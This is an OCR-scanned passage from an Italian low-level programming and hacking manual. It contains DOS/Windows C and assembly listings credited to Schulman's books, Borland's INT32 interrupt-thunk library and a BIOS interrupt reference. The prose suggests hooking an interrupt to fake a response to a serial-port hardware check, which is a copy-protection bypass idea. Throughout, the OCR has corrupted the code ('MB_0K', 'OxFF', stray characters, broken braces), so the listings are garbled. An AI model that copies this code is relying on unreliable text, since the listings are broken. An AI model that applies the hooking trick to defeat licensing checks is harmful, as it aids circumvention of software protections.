test al, 7fh 
jz no 
} 
return 1; 
no: return 0; 


void fail(const char *s, ...) { puts(s); exit(1); } 
int main() 


WORD i; 
FUNCPTR fp; 


if (! IsEnhancedMode()) 
fail("This program requires Windows Enhanced mode"); 


puts("Virtual-8086 (V86) VxD APIs:"); 
// for each possible device id, see if there's an API 
for (i=0; i<0xffff; i++) 
if (fp = GetDeviceAPI(i)) 
printf("%04Xh = %Fp  %O1X  %02X\n", 


i, // NVxD ID 
fp, // V86 entry point 
((DWORD) FP_SEG(fp) << 4) + FP_OFF(fp), // linear addr 
*((BYTE far *) fp)); // byte 
(ARPL) 
return 0; 
} 


Toy Win16 Server for FWORD.C (Win32->Win16 Thunk demo) 


/* 
Win32 app can call INT 21h, INT 2Fh, or INT 31h via INTSERV 


bcc -W -3 -B intserv.c 


from Schulman, Unauthorized Windows, 1994 
*/ 


#include <stdlib.h> 
#include <stdio.h> 
#include <dos.h> 
#define NOGDI 
#include "windows.h" 


static char dummy; // just something to take seg of 


// static vars: only one caller at a time 
#define SERVER(calls,intno) { \ 

static char stack[1024]; \ 
static unsigned stack_seg; \ 
static unsigned prev_seg; \ 
static unsigned long prev_ofs; \ 
static unsigned prev_ds; \ 
_asm { \ 

push ax; \ 

push bx; \ 

mov ax, ds; \ 

mov bx, seg dummy; \ 

mov ds, bx; \ 

mov stack_seg, bx; \ 

mov prev_ds, ax; \ 

pop bx; \ 

pop ax; \ 

mov prev_seg, ss; \ 

mov dword ptr prev_ofs, esp; \ 

mov ss, stack_seg; \ 

mov sp, offset stack; \ 

add sp, 512; \ 


} \ 
calls++; \ 
_asm { \ 
int intno; \ 
mov Ss, prev_seg; \ 
mov esp, dword ptr prev_ofs; \ 
mov ds, prev_ds; \ 
db 66h; \ 
retf; \ 
} \ 
} 
unsigned long calls21 = 0; 
unsigned long calls2F = 0; 
unsigned long calls31 = 0; 


void server21(void) { SERVER(calls21, 0x21); } 
void server2F(void) { SERVER(calls2F, 0x2F); } 
void server31(void) { SERVER(calls31, 0x31); } 


int PASCAL WinMain(HANDLE hInstance, HANDLE hprev21Instance, 
LPSTR lpszCmdLine, int nCmdShow) 
{ 


char buf[120]; 
int len; 


len = sprintf(buf, "INT 21h server @ %Fp\n", (void far *) server21); 
len += sprintf(buf+len, "INT 2Fh server @ %Fp\n", (void far *) server2F); 
len += sprintf(buf+len, "INT 31h server @ %Fp", (void far *) server31); 


MessageBox(0, buf, "INTSERV", MB_0K); 
// servers are active until click MB_0K above 


len = sprintf(buf, "%lu calls to INT 21h server\n", calls21); 

len += sprintf(buf+len, "%lu calls to INT 2Fh server\n", calls2F); 
len += sprintf(buf+len, "%lu calls to INT 31h server", calls31); 
MessageBox(0, buf, "INTSERV", MB_0K); 

return 0; 


} 


MAPPA I DEVICE IN MEMORIA 


vii 
MAP .C 
from "Undocumented DOS", 2nd edition (Addison-Wesley, 1993) 


bcc intvect.c map.c 
bcc intchain.c map.c 
bcc -DTESTING map.c 
*/ 


#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 
#include <dos.h> 


typedef unsigned char BYTE; 
typedef unsigned short WORD; 
typedef unsigned long DWORD; 
typedef void far *FP; 


#ifndef MK_FP 
#define MK_FP(S,0) ((((DWORD) Ss) << 16) + (0)) 
#endif 


#pragma pack(1) 
typedef struct { 
DWORD start, end; 
char name[9]; 
} BLOCK; 


static BLOCK *map; 
static int num_block = 0; 


int cmp_func(const void *b1, const void *b2) 


if (((BLOCK *) b1)->start < ((BLOCK *) b2)->start) return -1; 
else if (((BLOCK *) b1)->start > ((BLOCK *) b2)->start) return 1; 
else return 0; 
di 
typedef struct { 
BYTE type; /* 'M'=in chain; 'Z'=at end */ 
WORD owner; /* PSP of the owner */ 
WORD size; /* in 16-byte paragraphs */ 
BYTE unused[3]; 
BYTE name[8]; /* in DOS 4+ */ 
} MCB; 


#define IS_PSP(mcb) (FP_SEG(mcb) + 1 == (mcb)->owner) 


WORD get_first_mcb(void) 


{ 
_asm mov ah, 52h 
_asm int 21h 
_asm mov ax, es:[bx-2] 
// retval in AX 
} 


typedef struct DEV { 
struct DEV far *next; 
WORD attr, strategy, intr; 
union { 
BYTE name[8], blk_cnt; 
} U; 
} DEV; 


#define IS_CHAR_DEV(dev) ((dev)->attr & (1 << 15)) 


DEV far *get_nul_dev(void) 


{ 
_asm mov ah, 52h 
_asm int 21h 
_asm mov dx, es 
_asm lea ax, [bx+22h] 
// retval in DX:AX 
} 
int get_num_block_dev(DEV far *dev) 
{ 
// can't rely on # block devices at SysVars+20? 
int num_blk = 0; 
do { 
if (! IS_CHAR_DEV(dev)) 
num_blk += dev->u.blk_cnt; 
dev = dev->next; 
} while(FP_OFF(dev->next) != (WORD) -1); 
return num_blk; 
i 
WORD get_umb_link(void) 
{ 
_asm mov ax, 5802h 
_asm int 21h 
_asm xor ah, ah 
// return value in AX 
} 
WORD set_umb_link(WORD flag) 
Li 


asm mov ax, 5803h 
asm mov bx, flag 
_asm int 21h 
asm jc error 
asm xor ax, ax 
errori; 
// return © or error code in AX 
} 


WORD get_dos_ds(void) 
{ 
_asm push ds 
_asm mov ax, 1203h 
_asm int 2fh 


_asm mov ax, ds 

_asm pop ds 

// retval in AX 
} 


/* find IO.SYS segment with built-in drivers */ 
WORD get_io_seg(void) 


‘ 
WORD io_seg = 0; 
DEV far *dev = get_nul_dev(); 
do { 
if (IS_CHAR_DEV(dev)) 
if (_fstrncemp(dev->u.name, "CON ", 8) == 0) 
io_seg = FP_SEG(dev); // we'll take the last one 
dev = dev->next; 
} while(FP_OFF(dev->next) != (WORD) -1); 
return io_seg; 
} 


static int did_init = 0; 


void do_init(void) 
{ 
MCB far *mcb; 
DEV far *dev; 
WORD dos_ds, io_seg, mcb_seg, next_seg, save_link; 
BLOCK *block; 
int blk, i; 


map 


= (BLOCK *) calloc(100, sizeof(BLOCK)); 
block = 


map; 


io_seg = get_io_seg(); 

block->start = io_seg << 4; block->end = (DWORD) -1; 
strcpy(block->name, "I0"); 

block++; 


dos_ds = get _dos_ds(); 

block->start = dos_ds << 4; block->end = (DWORD) -1; 
strcpy(block->name, "DOS"); 

block++; 


// should really check if there IS an HMA! 
block->start = 0x100000L; block->end = Ox10FFEEL; 
strcpy(block->name, "HMA"); 
block++; 
num_block = 3; 


/* walk MCB chain, looking for PSPs, interrupt owners */ 
if (_osmajor >= 4) 


mcb_seg = get _first_mcb(); 
mcb = (MCB far *) MK_FP(mcb_seg, 0); 


if (_osmajor >= 5) // be lazy; see ch. 7 for DOS < 5 
save_link = get_umb_link(); 


set_umb_link(1); // access UMBs too 
} 


for (;;) 
{ 


next_seg = mcb_seg + mcb->size + 1; 


if (IS_PSP(mcb)) 


{ 
block->start = ((DWORD) mch_seg) << 4; 
block->end = ((DWORD) next_seg) << 4; 
_fstrncpy(block->name, mcb->name, 8); 
block->name[8] = '\0'; 
block++; 
num_block++; 
} 
mcb_seg = next_seg; 
if (mcb->type == 'M') 
mcb = (MCB far *) MK_FP(next_seg, 0); 
else 
break; 


} 


/* walk device chain looking for non-builtin drivers */ 
dev = get_nul _dev(); 
blk get_num_block_dev(dev); 
do { 
MCB far *dev_mcb; 
if ((FP_SEG(dev) != dos_ds) && (FP_SEG(dev) != io _seg)) 


block->start = (((DWORD) FP_SEG(dev)) << 4) + FP_OFF(dev); 
dev_mcb = (MCB far *) MK_FP(FP_SEG(dev)-1,0); 
if (dev_mcb->owner == 8) 


dev = dev->next; 


continue; 
} 
if (dev_mcb->type == 'M') 

block->end = block->start + ((DWORD) dev_mch->size << 4); 
else 


block->end = (DWORD) -1; 
if (IS_CHAR_DEV(dev)) 


_fstrncpy(block->name, dev->u.name, 8); 
block->name[8] = '\0'; 


i, 
else 
{ 
// to determine drive letter, have to work backwards 
// from number of block devices 
blk -= dev->u.blk_cnt; 
block->name[0] = blk + 'A'; 
block->name[1] = ':'; 
block->name[2] = '\0'; 
block++; 


num_block++; 


} 


dev = dev->next; 
} while(FP_OFF(dev->next) != (WORD) -1); 


if (_osmajor >= 5) 
set_umb_link(save_link); 


gsort(map, num _block, sizeof(BLOCK), cmp_func); 


for (i=0, block=map; i<num_block-1; i++, block++) 
if (block->end == (DWORD) -1) 


block->end = map[i+1].start; 
if (block->end == (DWORD) -1) // last one 
block->end = OxFFFFFL; 


did_init = 1; 


i; 
char *find_owner(DWORD lin_addr) 
È 
BLOCK *block; 
int i; 
if (! did init) 
do_init(); 
for (i=0, block=map; i<num_block; i++, block++) 
if ((lin_addr >= block->start) && 
(lin_addr <= block->end)) 
return block->name; 
/* still here */ 
return (char *) 0; 
i, 
#ifdef TESTING 
main() 
BLOCK *block; 
int i; 
do_init(); 
for (i=0, block=map; i<num_block; i++, block++) 
printf("%081X = %081xX  %s\n", 
block->start, block->end, block->name); 
#endif 


Detecting Windows mode, version from DOS 


/* 

ISWIN.C 

Andrew Schulman, February 1993 

from "Undocumented DOS", 2nd edition (Addison-Wesley, 1993) 


bcc -DSTANDALONE iswin.c 
ur 


#include <stdlib.h> 
#include <stdio.h> 
#include <dos.h> 


#define REAL_MODE 1 
#define STANDARD_MODE 2 
#define ENHANCED_MODE 3 
#define SYSTEM_VM 1 


int detect_switcher(void) 
{ 

int retval = 1; 

_asm push di 

_asm push es 

_asm xor bx, bx 

_asm mov di, bx 


_asm mov es, bx 
_asm mov ax, 4b02h 
asm int 2fh 

asm MOv Cx, es 

asm or cx, di 

asm je no_switcher 


asm pop es 
_asm pop di 
return retval; 

no_switcher: 
retval = 0; 
goto done; 


int is_win(int *pmaj, int *pmin, int *pmode) 


unsigned short retval; 
int maj=0, min=0, mode=0; 


/* make sure someone, anyone has INT 2Fh */ 
if (_dos_getvect(0x2F) == 0) 
return 0; 


/* call 2F/160A to see if Windows 3.1+ */ 
_asm mov ax, 160ah 
_asm int 2fh 
_asm mov retval, ax 
if (retval == 0) /* AX=0 if Windows running */ 
{ 
_asm mov mode, cx /* CX=2 means Std; CX=3 means Enh */ 
_asm mov byte ptr maj, bh /* BX = major/minor (e.g., 030ANh) */ 
_asm mov byte ptr min, bl 
“pmaj = maj; 
*pmin = min; 
*pmode = mode; 
return 1; 


} 


/* call 2F/1600 to see if Windows 3.0 Enhanced mode or Windows/386 */ 
_asm mov ax, 1600h 

_asm int 2fh 

_asm mov byte ptr maj, al 

_asm mov byte ptr min, ah 

if ((maj == 1) || (maj == OxFF)) /* Windows/386 2.x is running */ 


pi /* Windows/386 2.x */ 

*pmin ; /* don't know; assume 2.1? */ 

*pmode = ENHANCED_MODE; /* Wwindows/386 sort of like Enhanced */ 
return 1; 


} 
else if (! ((maj == 0) || (maj == 0x80))) /* AL=0 or 80h if no Windows */ 
/* must be Windows 3.0 Enhanced mode */ 
“pmaj = maj; 
*pmin = min; 
*pmode = ENHANCED_MODE; 
return 1; 


} 


/* call 2F/4680 to see if Windows 3.0 Standard or Real mode; but, 

this could be a "3.0 derivative" such as DOSSHELL task switcher! */ 
_asm mov ax, 4680h 
_asm int 2fh 


_asm mov retval, ax 
if (retval == 0) /* AX=0 if 2F/4680 handled */ 
i 

/* make sure it isn't DOSSHELL task switcher */ 

if (detect_switcher()) 

return 0; 
*pmaj = 3; 
*pmin = 0; 


/* either have Windows Standard mode or Real mode; to 
distinguish, have to do fake Windows broadcasts with 
2F/1605. Yuk! We'll avoid that here by assuming 
3.0 Standard mode. If you really want to distinguish 
3.0 Standard mode and Real mode, see _MSJ_, March 1991, 
p. 113; and MS KB articles Q75943 and Q75338 */ 

*pmode = STANDARD_MODE; 

return 1; 


} 


/* still here -- must not be running Windows */ 
return 0; 


} 


#ifdef STANDALONE 
main() 


int maj, min, mode=0; 
if (! is _win(&maj, &min, &mode)) 
printf("Windows is not running\n"); 
else if (maj == 2) 
printf("Running Windows/386 2.x\n"}); 


else 
printf("Running Windows %u.%02u (or higher) %s mode\n", 
maj, 
min, 
(mode == REAL_MODE) ? "Real" 


(mode == STANDARD_MODE) ? "Standard" 
(mode == ENHANCED_MODE) ? "Enhanced" 
/* don't know */ "929?"); 


if (mode == ENHANCED_MODE) 


{ 

unsigned short vm; 

/* call 2F/1683 to see if DOS app running in System VM; if so, 
this must be some hacked version of Windows like MSDPMI, 
or we must be running inside WINSTART.BAT */ 

_asm mov ax, 1683h 

_asm int 2fh 

_asm mov vm, bx 

if (vm == SYSTEM_VM) 

printf("Running DOS app in System VM: " 
"Must be WINSTART.BAT or hacked Windows!\n"}); 
else 
printf("VM #%u\n", vm); 
} 


/* could also call 2F/160C to check for Windows in ROM */ 
return mode; /* can be tested with ERRORLEVEL */ 


#endif 


SERVIZI D’INTERRUPTS BIOS E DOS 


Spesso è necessario intercettare certi interrupts e quindi la cosa fondamentale 
è conoscere lo scopo di questi. 

Alcuni tipi di programmi basano il loro modo di funzionare in rapporto al 
sistema di gestione degli interrupts. 

Nei capitoli precedenti avevo riferito il fatto che nei primi 1024 bytes di 
memoria sono residenti gli indirizzi dei 256 possibili interrupts per cui, a 
parte sapere dove sono residenti, sarebbe possibile settare delle nostre 
routines al posto di questi. 

Due funzioni particolari dell’int 21h riportano e settano gli indirizzi degli 
interrupts per cui volendo sfruttare una di queste possibilità potremmo usare 
queste al posto di andare a scrivere e leggere direttamente dalla memoria. 

Tutti i programmi residenti (TSR) si basano su questa metodologia e tra questa 
tipologia di programmami troviamo anche i Virus che indipendentemente dal fatto 
che come scopi siano stupidate, dal punto di vista tecnico spesso sono dei 
giocattoli ben fatti. 

Vedremo anche queste metodologie che spero verranno utilizzate per scopi 
intelligenti. 

La metodologia per la scrittura di questi è interessante anche per quanto 
riguarda SoftIce. 

SoftIce possiede uno dei suoi punti di forza nei breakpoint. 

Grazie alla metodologia degli interrupts è possibile espandere le possibilitèà 
dei breakpoint di SI. 

Comunque per questo vi rimando al capitolo relativo a SI. 

Quando si scrive una funzione od una procedura normalmente questa viene 
terminata mediante un’istruzione di RET (return). 

Le procedure d’interrupts terminano con l'istruzione IRET (interrupt return). 
Molti linguaggi ad alto livello possiedono le specifiche adatte per la scrittura 
di procedure adatte per essere utilizzate come routines d’interrupt anche se 
sicuramente la scelta di un linguaggio differente dall’assembler complica certe 
cose. 

Nella scrittura dei programmi residenti (TSR) sorgono alcune problematiche 
legate alla non rientranza del DOS. 

A dire il vero questo era un problema esistente nel 1986, anni in cui scrissi un 
volume di 400 pagine dedicato alla scrittura dei programmi residenti in 
Linguaggio C. 

Il volume si intitolava “Programmazione a basso livello in Linguaggio C” e se vi 
interessa sicuramente lo troverete tra i testi PD residenti sulla rete FidoNet. 
Essendo questo volume un manuale destinato a trattare tutte le tecniche che 
spesso sono necessarie agli hacker vi riporto due file che vi permetteranno di 
scrivere routines d’interrupt in C. 

Infatti, com3e dicevo prima, spesso è necessario intercettarli per modificarne 
il funzionamento. 

Supponiamo che un programma interroghi una porta seriale per vedere se è 
attaccata a questa qualche strano dispositivo hardware. 

Per risolvere il problema sarebbe sufficiente eseguire una routine del tipo: 


SALVA L'INDIRIZZO DELL’INTERRUPT 
SETTA COME INDIRIZZO QUELLO DELLA MIA FUNZIONE 
QUANDO VIENE CHIAMATA LA MIA FUNZIONE RITORNA IL VALORE CHE DESIDERO 


Il seguente file è per compilatore Borland 


e INT32.MAK 


Ciara ra iaia a ara ata asia a ara aaa ia e e a naiaiai iaia area aiar a aaa area naiaiai area ra arenarie eraranaraiitiarereraiaiaiati 
# INT32.MAK 

# 

# Copyright (c) 1994 by Borland International 


All rights reserved. 


This is a small library to be used to create thunks for interrupt functions 


in 32bit DOS extended applications. The idea is to permit people to 
preserve their interrupt functions written in C/C++ to the greatest extent 
possible without adding compiler support. The argument layout for 


interrupt functions supported here matches that of the previous Borland 
16bit interrupt functions, except that the arguments have been widened to 
32bits. 


See the file t.c for an example of an interrupt function for 32bits. 


We are providing a _makeInt32Thunk function which constructs a thunk for 
the C/C++ interrupt functions which loads DS and builds the argument frame 
as expected. There is an option in the thunk creation to allow the thunk 
to chain to the old handler once the user handler has completed. 


void * _makeInt32Thunk (void * proc, 
void * dsLoc, 
unsigned short chainSel, 
unsigned long chainoffset); 


Builds a 32bit interrupt thunk for 'proc'. 'proc' should be an interrupt 
function declared as follows: 


void iproc (unsigned long ebp, unsigned long edi, unsigned long esi, 
unsigned long ds, unsigned long es, unsigned long edx, 
unsigned long ecx, unsigned long ebx, unsigned long ebx, 
unsigned long eip, unsigned long cs, unsigned long flags); 


'dsLoc' should be a pointer to where the DS which the interrupt procedure 
requires is stored. The value stored there will be loaded into DS before 
your interrupt procedure is called. 


'chainSel' is the optional selector of the interrupt routine that you want 
to chain to on return from your function. 


'chainoOffset' is the optional offset of the interrupt routine that you want 
to chain to on return from your function. If this is 0, then no chaining 
will be performed, and the thunk will return with an IRET instruction. If 
'chainoffset' is non-zero, then the thunk will chain to the interrupt 
routine at chainSel:chainoffset with a 48bit jump on return from your 
handler. 


The return value is either a thunk address which you can use in calls to 
set protected mode interrupt vectors, or NULL (in the case of failure). 


# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# Note that the thunk returned is not allocated from a locked page. If you 
# require that the page be locked, you will have to lock it yourself with 
# DPMI call 600. 

# 

# Use 'MAKE -fint32 all' to build the lib and the example 

# 

frana ra iaia ara a ata ai aia arena aaa ii e eran aiaiai ia ra area aiar arena aaa deren aiai airone ra arena aiar arena araiaitiareraraiaiaitti 


LIB_DEP — PFXi32t.0bj \ 
PFXint32.0bj 


#DEBUG = -V 
all: int32.lib testint.exe 


i32t.0bj: i32t.asm 


tasm32 /ml /m2 i132t 


int32.0bj: int32.c 
bcc32 -WX -c -w $(DEBUG) int32.c 


int32.lib: $(LIB_DEP:PFX=) 
tlib int32.lib @&&| 

$(LIB_DEP:PFX=-+) 

| 


testint.exe: int32.lib testint.obj 
tlink32 /ax $(DEBUG) /L$(MAKEDIR)\..\lib c0x32 testint,testint,,int32 
dpmi32 cw32 import32 


testint.obj: testint.c 
bcc32 -WX -c -w $(DEBUG) testint.c 


e INT32.H 

#ifndef __INT32_H 

#define __INT32_H 

void * _makeInt32Thunk (void *proc, void *dsLoc, unsigned short chainSel, 


unsigned long chainoffset); 


#endif 


e INT32.C 


/* Lats Zia detti DOT alte i i e */ 
/* */ 
/* INT32.C - Source code for INT32.LIB */ 
SE */ 
/* Copyright (c) 1994 by Borland International */ 
/* All Rights Reserved */ 
/* */ 
/* This library allows interrupt handlers to be written in C or */ 
/* */ 
Ae */ 
Vai */ 
L* */ 
/* E AE I LELLO e STONE I ELL lil Lei e AIA */ 
#include <stdlib.h> 

#include <mem. h> 

#include "int32.h" 

extern char _interrupt32Thunk []; 

extern int  _interrupt32ThunkSize; 

extern int _I32TdsLoadLabel; 

extern int _I32TcallLabel; 

extern int.  _1I32TchainCmp; 

extern int _I32TchainLabel; 

extern int _I32Tchainoffset; 

extern int _I32TchainSel; 

static int interrupt32ThunkSize = (int)& interrupt32ThunkSize; 

static int I32TdsLoadLabel = (int)&_I32TdsLoadLabel; 


static int I32TcallLabel = (int)& I32TcallLabel; 


static int I32TchainCmp = (int)& I32TchainCmp; 


static int I32TchainLabel = (int)& I32TchainLabel; 
static int I32Tchainoffset = (int)& I32Tchainoffset; 
static int I32TchainSel = (int)& I32TchainSel; 


#define adjust(where,what) (*(char**)(thunk + (where))) += (what) 
#define stampDD(where,what) *(void**)(thunk + (where)) = (what) 
#define stampDW(where,what) *(unsigned short *)(thunk + (where)) = (what) 


void * _makeInt32Thunk (void *proc, void *dsLoc, unsigned short chainSel, 
unsigned long chainoffset) 
{ 


char *thunk; 


thunk = (char *)malloc (interrupt32ThunkSize); 
if (thunk) 


{ 
memcpy (thunk, _interrupt32Thunk, interrupt32ThunkSize); 
stampDD (I32TdsLoadLabel, dsLoc); 
stampDD (I32TcallLabel, (char *)(((char *)proc) - (thunk + 
I32TcallLabel + 4))); 
adjust (I32TchainCmp, ((unsigned long)thunk) - ((unsigned 
long)_interrupt32Thunk)); 
adjust (I32TchainLabel, ((unsigned long)thunk) - ((unsigned 
long)_interrupt32Thunk)); 
stampDD (I32TchainOffset, (void *)chainoffset); 
stampDW (I32TchainSel, chainSel); 
} 


return thunk; 


} 
e INT32.ASM 


.386p 
locals 


_DATA segment dword public 'DATA' use32 
assume cs:_DATA 


dummy proc near 

@@startThunk label byte 
PUBLIC _ interrupt32Thunk 

_ _interrupt32Thunk label byte 


push eax 
push ebx 
push ecx 
push edx 
push es 

push ds 

push esi 
push edi 
push ebp 


MOV ds, word ptr cs:[012345678h] 


PUBLIC __I32TdsLoadLabel 


__I32TdsLoadLabel EQU $ - @@startThunk - 4 


db 0egh 

dd (0) 

PUBLIC __I32TcallLabel 

__I32TcallLabel EQU $ - @@startThunk - 4 

pop ebp 

pop edi 

pop esi 

pop ds 

pop es 

pop  edx 

pop ecx 

pop ebx 

pop eax 


cmp  dword ptr chainoffset, 0 


PUBLIC __I32TchainCmp 

__I32TchainCmp EQU $ - @@startThunk - 5 
jne @@chain 

@@iret: 
iret 

@@chain: 


jmp fword ptr [chainoffset] 


PUBLIC __132TchainLabel 
__I32TchainLabel EQU $ - @@startThunk - 4 


PUBLIC __I32Tchainoffset 
__I32TchainOffset EQU $ - @@startThunk 


chainOffset label dword 


dd (0) 

PUBLIC __I32TchainSel 
__I32TchainSel EQU $ - @@startThunk 

dw (0) 

PUBLIC _ interrupt32ThunkSize 


_ interrupt32ThunkSize EQU $ - @@startThunk 
dummy endp 

_DATA ends 

end 


Non mi prolungherò nella teoria anche se di fatto non è per nulla complicata. 
Alcuni interrupts svolgono più funzioni le quali vengono selezionate inserendo 
dentro ad appositi registri i valori idonei. 

Generalmente AX nel passaggio di valori legati al tipo di funzione richiesta ha 
un ruolo primario. 

Inoltre gli interrupts si attengono alle regole generali delle funzioni ovvero 
spesso possiedono argomenti in ingresso e molte volte restituiscono determinati 
valori. 

Nella tabella seguente sono riportati i servizi d’interrupts e gli usi dei 
registri. 


INTERRUPTS ROM BIOS 


e ROM PRINT SCREEN SERVICE [int 05] 


in: none 
out: 0050:0000 = status code 
00 = ready 
01 = busy 
FF = previous operation not completed successfully 


e ROM VIDEO SERVICES [int 10] 


WRITE VIDEO MODE - rom_vid 


in: ah = wr_vid_mode [00] 
al = mode 00 = 40 X 25 text 16 grey \ 
01 = 40 X 25 text 16/8 color | 
02 = 80 X 25 text 16 grey | 
03 = 80 X 25 text 16/8 color | CGA 
04 = 320 X 200 graphics 4 color | 
05 = 320 X 200 graphics 4 grey | 
06 = 640 X 200 graphics b/w / 
07 = 80 X 25 text b/w | MDA 
08 = 160 X 200 graphics 16 color \ 
09 = 320 X 200 graphics 16 color | PC-JR 
OA = 640 X 200 graphics 4 color / 
OD = 320 X 200 graphics 16 color \ 
OE = 640 X 200 graphics 16 color | EGA 
OF = 640 X 350 graphics 4 color / 
out: none 
WRITE CURSOR SIZE - rom_vid 
in: ah = wr_cur_size [01] 
ch = start line CGA = 0 to 7, default = 6, 7 
cl = end line MDA = 0 to 13, default = 12, 13 


out: none 

notes: Setting ch bit 5 causes cursor to disappear. If start line 
is less than end line, a normal single part cursor is created. 
If start line is greater than end line, a two part cursor is 
created. 


WRITE CURSOR POSITION - rom_vid 


in: ah = wr_cur_pos [02] 
bh = page (0 for graphics modes) 
dh = row 
dl = col 
out: none 
notes: writing cursor to an off screen position causes it to 
disappear. 


READ CURSOR POSITION - rom_vid 


in: ah = rd_cur_pos [03] 
out: bh = page (0 for graphics modes) 
ch = start line 
cl = end line 
dh = row 
dl = col 


READ LIGHT PEN POSITION - rom_vid 
in: ah = rd_pen_pos [04] 
out: ah = pen trigger switch 

1 = triggered 


O = not triggered 


bx = pixel col 
ch = pixel row 
dh = char row 
dl = char col 


WRITE ACTIVE PAGE - rom_vid 
in: ah = wr_act_page [05] 
al = page 
out: none 


PC-JR WRITE ACTIVE PAGE - rom_vid 


in: ah = wr_act_page [05] 
al = 80 

out: bh = CRT reg 
bl = CPU reg 

in: ah = wr_act_page [05] 
al = 81 
bl = CPU reg 

out: bh = CRT reg 
bl = CPU reg 

in: ah = wr_act_page [05] 
al = 82 
bh = CRT reg 

out: bh = CRT reg 
bl = CPU reg 

in: ah = wr_act_page [05] 
al = 83 
bh = CRT reg 
bl = CPU reg 

out: bh = CRT reg 
bl = CPU reg 


SCROLL WINDOW UP - rom_vid 


in: ah = scroll up [06] 

al = lines (0 = all) 

bh = color attribute 
bit 7 = blink 
bit 6 = backgnd red 
bit 5 = backgnd green 
bit 4 = backgnd blue 
bit 3 = foregnd intensity 
bit 2 = foregnd red 
bit 1 = foregnd green 
bit 0 = foregnd blue 

ch = upper row 

cl = left col 

dh = lower row 

dl = right col 


out: none 


SCROLL WINDOW DOWN - rom_vid 


in: ah = scroll down [07] 
al = lines (0 = all) 
bh = color attribute (see scroll_up) 
ch = upper row 
cl = left col 
dh = lower row 
dl = right col 


out: 


e] 
(©) 
e] 
D 


READ CHARACTER AND ATTRIBUTE - rom_vid 


in: ah = rd_char_attr [08] 
bh = page 
out: al = char 
ah = color attribute (see scroll_up) 


WRITE CHARACTER AND ATTRIBUTE - rom_vid 


in: ah = wr_char_attr [09] 
al = char 
bh = page 
b1 = color attribute (see scroll_up) 
cx = chars 
out: none 
notes: Cursor is not moved. 


WRITE CHARACTER - rom_vid 


in: ah = wr_char [0A] 
al = char 
bh = page 
bl = graphics mode color 
cx = chars 
out none 
notes: Cursor is not moved. 


WRITE COLOR PALETTE - rom_vid 
in: ah = wr_col pal [0B] 
bh = palette id 
= color 
out: none 


WRITE PIXEL - rom_vid 


in: ah = wr_pixel [0C] 
al = color 
cx = pixel col 
dl = pixel row 
out: none 


READ PIXEL - rom_vid 


in: ah = rd_pixel [OD] 
cx = pixel col 
dl = pixel row 
out: al = color 


WRITE TTY CHARACTER - rom_vid 


in: ah = wr_tty [0E] 
al = char 
bl = graphics mode color 


out: none 


READ VIDEO MODE - rom_vid 


in: ah = rd_vid mode [0F] 
out: ah = width in chars 
al = video mode 
bh = page (0 for graphics modes) 


PC-JR WRITE COLOR PALETTE REGISTER - rom_vid 


in: ah = wr_pal_reg [10] 
al = 00 
bh = palette value 
b1 = palette reg 


out: none 


in: ah = wr_pal_ reg [10] 
al = 01 

bh = border color 
out: none 


PC-AT WRITE STRING - rom_vid 


in: ah = wr_string [13] 
al = cursor movement switch 
00 = no 
01 = yes 
b1 = color attribute (see scroll_up) 
bh = page 
dx = start cursor position 


string length 
es:bp = string pointer 


e ROM EQUIPMENT SERVICE [int 11] 

in: none 

out: ax bit settings = equipment list 
disk drive 
math coprocessor 
= system board RAM in 16k blocks 
= initial video mode 

00 = unused 

40 X 25 color 
80 X 25 color 

11 = 80 X 25 b/w 

= number of disk drives 

8 = DMA not present 


CW II II 


9,10,11 = number of RS232 cards in system 
12 = game I/0 present 
13 = serial printer present 


14,15 number of printers present 


rom_mem ROM MEMORY SIZE SERVICE [int 12] 
in: none 
out: ax = size in K 


e ROM DISKETTE SERVICES [int 13] 


RESET DISKETTE SYSTEM - rom_disk 
in: ah = rst_disk [00] 
out: none 


READ DISKETTE STATUS - rom_disk 
in: ah rd_disk_stat [01] 
out: al return code 


01 = bad command 

02 = address mark not found 
03 = write protected 

04 = sector not found 

06 = no disk 

08 = DMA overrun 

09 = DMA across 64K boundary 
10 = bad CRC 

20 = controller failed 

40 = seek failed 


time out 


READ DISKETTE SECTOR - rom_disk 


in: ah = rd_disk_sect [02] 
al = sectors to read 
ch = track 
cl = sector 
dh = head 
dl = drive 
es:bx = buffer pointer 
out: cf = error 
ah = return code (see rd disk _stat) 
al = sectors read 


WRITE DISKETTE SECTOR - rom_disk 


in: ah = wr_disk_sect [03] 
al = sectors to write 
ch = track 
cl = sector 
dh = head 
dl = drive 
es:bx = buffer pointer 
out: cf = error 
ah = return code (see rd disk stat) 
al = sectors written 


VERIFY DISKETTE SECTOR - rom_disk 


in: ah = ver_disk_sect [04] 
al = sectors to verify 
ch = track 
cl = sector 
dh = head 
dl = drive 
es:bx = buffer pointer 
out: cf = error 
ah = return code (see rd disk _stat) 
al = sectors verified 


FORMAT DISKETTE TRACK - rom_disk 


in: ah = fmt_disk_trk [05] 
al = sectors to format 
ch = track 
cl = sector 
dh = head 
dl = drive 
es:bx = four byte address field pointer 
byte 1 = track 
byte 2 = head 
byte 3 = sector 
byte 4 = bytes/sector 
out: cf = error 
ah = return code (see rd disk stat) 
al = sectors formatted 


PC-AT READ DISKETTE PARAMETERS - rom_disk 
in: ah = rd_disk_parm [08] 


out: cf = error 
ah = return code (see rd disk _stat) 
dl = drives 
dh = max sides 
cl = max sectors 
ch = max tracks 


PC-AT INITIALIZE DISKETTE PARAMETERS - rom_disk 


PC-AT 


PC-AT 


PC-AT 


PC-AT 


PC-AT 


PC-AT 


PC-AT 


PC-AT 


in: ah = init_disk_parm [09] 
out: cf = error 

= return code (see rd _disk_ stat) 
int 41 vector points to drive 0 table 
int 46 vector points to drive 1 table 


READ DISKETTE LONG - rom_disk [0A] 
in: ah = rd_disk_long 
ch = cylinder 
cl = sector 
dh = head 
dl = drive 
es:bx = buffer pointer 
out: cf = error 
ah = return code (see rd disk _stat) 
WRITE DISKETTE LONG - rom_disk 
in ah = wr_disk_long [0B] 
ch = sector 
dh = head 
dl = drive 
es:bx = buffer pointer 
out: cf = error 
ah = return code (see rd disk _stat) 
SEEK DISKETTE TRACK - rom_disk 


in: ah = disk_seek [0C] 
ch = sector 
dh = head 
dl = drive 
es:bx = buffer pointer 
out: cf = error 
ah = return code (see rd disk _stat) 


ALTERNATE DISKETTE RESET - rom_disk 


